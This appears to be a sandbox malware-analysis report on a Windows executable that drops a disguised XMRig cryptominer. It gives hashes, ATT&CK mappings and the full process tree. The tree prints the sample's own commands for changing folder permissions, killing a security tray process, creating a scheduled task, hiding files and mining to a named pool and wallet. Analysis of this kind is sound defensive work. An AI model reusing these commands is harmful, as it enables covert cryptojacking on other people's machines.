Overview

overview

10

Static

static

3

ddf6edbdb8...18.exe

windows7-x64

10

ddf6edbdb8...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/09/2024, 07:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe

  • Size

    4.6MB

  • MD5

    ddf6edbdb88c1fb6f8ce7e8285109710

  • SHA1

    c04ddbdc2cdbc1925b7544c3718270672c01a807

  • SHA256

    ec03f155bfdfa8c72f3bab882afe7b03d3d6898a8fb0a6a830c98d8ad39a348d

  • SHA512

    fdc7f527e745759a42605e5f116fd0085477925408fdd3c54313abff1c2cbb53acfe86544835af8d5437864cb4887f7aa2348a98ecf9fa3f9f49868618334def

  • SSDEEP

    98304:AVU6BHZRv4Meak0ZM0p2B6LwFKHXTjKzZXh5:+j9ZRQXn6cFSXT+z

Score
10/10
xmrigdefense_evasiondiscoveryminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 6 IoCs
    miner
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Modifies file permissions 1 TTPs 6 IoCs
    discovery
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 2 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "admin:(R,REA,RA,RD)"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:4196
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-5-7:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:1144
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "admin:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:4716
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM SecurityHealthTray.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:860
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM SecurityHealthTray.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3728
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c RMDIR /S /Q C:\ProgramData\SecurityEssentials
      2⤵
        PID:2644
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /F /IM SecurityHealthTray.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM SecurityHealthTray.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2368
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c RMDIR /S /Q C:\ProgramData\SecurityEssentials
        2⤵
          PID:4268
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN Windows\x86_microsoft-windows-fsrm-common_31bf3256ad364e35_10.0.18372.1_none_3fed101f25aae892\MicrosoftSecurityEssentials /XML "C:\ProgramData\SecurityEssentials\task.xml"
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4980
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials" & ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"& ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"
          2⤵
          • Hide Artifacts: Hidden Files and Directories
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Windows\system32\attrib.exe
            ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials"
            3⤵
            • Views/modifies file attributes
            PID:2676
          • C:\Windows\system32\attrib.exe
            ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"
            3⤵
            • Views/modifies file attributes
            PID:4548
          • C:\Windows\system32\attrib.exe
            ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"
            3⤵
            • Views/modifies file attributes
            PID:4696
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c DEL /F /Q C:\ProgramData\SecurityEssentials\task.xml
          2⤵
            PID:4612
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3856
            • C:\Windows\system32\icacls.exe
              icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
              3⤵
              • Modifies file permissions
              PID:4252
            • C:\Windows\system32\icacls.exe
              icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
              3⤵
              • Modifies file permissions
              PID:4416
            • C:\Windows\system32\icacls.exe
              icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"
              3⤵
              • Modifies file permissions
              PID:3516
        • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
          C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
          1⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3644
          • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
            "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=10 -o pool.hashvault.pro:5555 -u 83GTGcroaPp62ba8bLofMeCvfswfuLyiS8vQv1Pq7gLU69pUo9jchLhJzXR6TSsDLsDoeWm6awZbPTRyumYopDxeScQVAsN -p x --rig-id={afdcdefbefe}
            2⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4444
            • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
              "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=50 -o pool.hashvault.pro:5555 -u 83GTGcroaPp62ba8bLofMeCvfswfuLyiS8vQv1Pq7gLU69pUo9jchLhJzXR6TSsDLsDoeWm6awZbPTRyumYopDxeScQVAsN -p x --rig-id={afdcdefbefe}
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              PID:4764
        • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
          C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
          1⤵
          • Executes dropped EXE
          PID:864
        • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
          C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
          1⤵
          • Executes dropped EXE
          PID:3108

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\SecurityEssentials\task.xml
          Filesize

          1KB

          MD5

          75d36f991d4b31e7403d029ef1090309

          SHA1

          1dc4298c779cd92fbb9acd581eb22cc673c8db0f

          SHA256

          daf142a796681e4d72cbc457a06cd8e3ce78a523d512312a1305cc3b23b8a4d6

          SHA512

          57ab436000a3b404d0f18f293a95a2c0b72d429309039315675dd5b48537ff5195bf7ab022d86b2fb7f0129c612fa4b3d90f1196d996a1ceac3f680f6c1599d3

          Download Submit

        • memory/864-31-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

          Filesize

          13.0MB

          Download

        • memory/2700-0-0x00007FF6118D0000-0x00007FF6125CE000-memory.dmp

          Filesize

          13.0MB

          Download

        • memory/2700-4-0x0000020D463E0000-0x0000020D463F4000-memory.dmp

          Filesize

          80KB

          Download

        • memory/3108-37-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

          Filesize

          13.0MB

          Download

        • memory/3644-13-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

          Filesize

          13.0MB

          Download

        • memory/4444-19-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

          Filesize

          13.0MB

          Download

        • memory/4764-25-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

          Filesize

          13.0MB

          Download